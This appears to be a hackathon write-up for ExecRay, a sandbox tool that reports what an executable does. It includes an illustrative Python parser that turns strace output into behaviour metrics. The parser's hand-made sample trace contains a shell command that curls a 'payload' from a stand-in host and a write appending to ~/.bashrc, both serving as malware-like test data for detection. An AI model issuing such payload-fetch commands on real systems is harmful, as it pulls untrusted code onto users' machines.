Inspiration
Developers often want to understand, at a fine-grained level, the software they download. From a security standpoint it makes sense to double-check downloaded executables for suspicious behaviour. An antivirus typically only flags a file as malicious or marks it as safe, and abstracts away all of the internal processing. We wanted to expose that processing and give developers all the relevant information about the target executable so that they can make a more informed decision about whether to include the software in their project.
What it does
We built a developer tool that performs static and dynamic analysis on a target executable and presents all of the results to the user through a web interface. Metrics collected include external process creation, hardware resources consumed, network activity (opened ports and REST API verbs), database connections, and modification of system files and the registry.
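As an added illustration (not ExecRay's own code), the following shows how the dynamic side of those metrics can be derived from a syscall trace: the parser reads strace-style lines and reports process creation, network endpoints, database connections, HTTP verbs and files opened for writing. The trace lines are constructed for this example rather than captured from a real binary, the database port table and the regular expressions are this example's own assumptions, and `strace` is only one possible collector. Registry modification is a Windows-specific metric and is not covered by a Linux syscall trace, so it does not appear here.

```python
"""Summarise a dynamic-analysis syscall trace into reviewer-facing metrics.

Added example, not part of ExecRay. Input lines follow the format of
`strace -f -s 256 -e trace=execve,connect,openat,sendto,write ./target`;
the SAMPLE_TRACE below is constructed by hand, not a real capture.
"""
import re
from typing import Any, Dict, Iterable

# Assumption: default ports of common database engines, used to classify connects.
DB_PORTS = {1433: "mssql", 3306: "mysql", 5432: "postgresql", 6379: "redis", 27017: "mongodb"}
# open(2) flags that mean the file may be written, created or truncated.
WRITE_FLAGS = {"O_WRONLY", "O_RDWR", "O_CREAT", "O_TRUNC", "O_APPEND"}

# One strace line: optional "[pid N]" prefix (added by -f), syscall name, args, return value.
_LINE = re.compile(r"^(?:\[pid\s+\d+\]\s+)?(?P<call>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>-?\w+)")
# First quoted string argument, skipping an optional leading fd or AT_FDCWD (open vs openat).
_FIRST_STRING = re.compile(r'^(?:(?:AT_FDCWD|\d+),\s*)?"(?P<s>[^"]*)"')
_OPEN_FLAGS = re.compile(r'",\s*(?P<flags>[A-Z_0-9|]+)')
_PORT = re.compile(r"sin6?_port=htons\((?P<port>\d+)\)")
_ADDR = re.compile(r'(?:inet_addr|inet_pton\(AF_INET6,)\s*\(?"(?P<addr>[^"]+)"')
# Outbound socket write whose payload starts like an HTTP request line.
_HTTP = re.compile(r'^\d+,\s*"(?P<verb>GET|POST|PUT|PATCH|DELETE|HEAD|OPTIONS)\s+(?P<path>\S+)')

# Constructed trace: the target appends to a shell rc file, spawns a shell that
# fetches a payload over HTTP, tries (and fails) to reach a local PostgreSQL, and
# POSTs a report. None of this was captured from a real binary.
SAMPLE_TRACE = [
    'execve("./target", ["./target"], 0x7ffe3a1b2c00 /* 12 vars */) = 0',
    '[pid 4242] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3',
    '[pid 4242] openat(AT_FDCWD, "/home/dev/.bashrc", O_WRONLY|O_CREAT|O_APPEND, 0644) = 4',
    '[pid 4242] clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f3c) = 4243',
    '[pid 4243] execve("/bin/sh", ["sh", "-c", "curl http://10.0.0.5/payload"], 0x7ffe3a1b2d10 /* 12 vars */) = 0',
    '[pid 4243] connect(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("10.0.0.5")}, 16) = 0',
    '[pid 4243] sendto(3, "GET /payload HTTP/1.1\\r\\nHost: 10.0.0.5\\r\\n\\r\\n", 42, MSG_NOSIGNAL, NULL, 0) = 42',
    '[pid 4242] connect(5, {sa_family=AF_INET, sin_port=htons(5432), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 ECONNREFUSED (Connection refused)',
    '[pid 4242] write(6, "POST /api/v1/report HTTP/1.1\\r\\nHost: api.example.test\\r\\n\\r\\n", 58) = 58',
]


def summarize_trace(lines: Iterable[str]) -> Dict[str, Any]:
    """Fold syscall lines into the metrics a reviewer would want to see."""
    report: Dict[str, Any] = {
        "processes": [],          # execve'd binaries, in order of execution
        "network": set(),         # (address, port) connect() targets, failed attempts included
        "database": set(),        # (engine, address, port) for connects to well-known DB ports
        "http_requests": set(),   # (verb, path) seen at the start of outbound socket writes
        "files_modified": set(),  # paths opened with write/create/truncate flags
        "failed_calls": 0,
    }
    for raw in lines:
        m = _LINE.match(raw.strip())
        if not m:
            continue  # e.g. "<unfinished ...>" fragments or strace's own status messages
        call, args, ret = m["call"], m["args"], m["ret"]
        if ret.startswith("-"):
            # Count but do not drop: a refused connect to an odd host is still evidence of intent.
            report["failed_calls"] += 1
        if call == "execve":
            s = _FIRST_STRING.match(args)
            if s:
                report["processes"].append(s["s"])
        elif call == "connect":
            port, addr = _PORT.search(args), _ADDR.search(args)
            if port and addr:
                endpoint = (addr["addr"], int(port["port"]))
                report["network"].add(endpoint)
                if endpoint[1] in DB_PORTS:
                    report["database"].add((DB_PORTS[endpoint[1]],) + endpoint)
        elif call in ("open", "openat"):
            s, flags = _FIRST_STRING.match(args), _OPEN_FLAGS.search(args)
            if s and flags and WRITE_FLAGS & set(flags["flags"].split("|")):
                report["files_modified"].add(s["s"])
        elif call in ("write", "send", "sendto", "sendmsg"):
            h = _HTTP.match(args)
            if h:
                report["http_requests"].add((h["verb"], h["path"]))
    return report


if __name__ == "__main__":
    import pprint
    pprint.pprint(summarize_trace(SAMPLE_TRACE))
```

Note that a bare `clone`/`fork` does not appear under `processes`: only the subsequent `execve` tells you which binary actually ran, which is what a reviewer wants to see. Plain-text HTTP verbs are only visible because the sample talks to port 80; for TLS traffic the verbs would have to be recovered at the library layer or via an intercepting proxy rather than from the socket write.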
How we built it
The core static and dynamic analysis code is written in Python. For the web application we used Flask on the server side and HTML/CSS/JavaScript for the front end. AWS (EC2) and Docker were used to spin up VMs in the cloud on which the target executables are deployed and run.
Challenges we ran into
This was my first time using AWS and Docker. Configuring these tools properly is a very technically exhausting and slow process. Establishing an EC2 instance, which should have taken two minutes, took 45 minutes. Regardless, we learned a lot this weekend.
Accomplishments that I'm proud of
We are proud of developing a fully containerized, scalable, usable security application over the course of two days.
What we learned
We honed our Python, DevOps, and systems programming knowledge. We didn't have much security experience either, so learning static and dynamic analysis techniques was extremely interesting.
What's next for ExecRay
We would love to further strengthen the core algorithms and capture more of the process behaviour that is otherwise hidden from the user.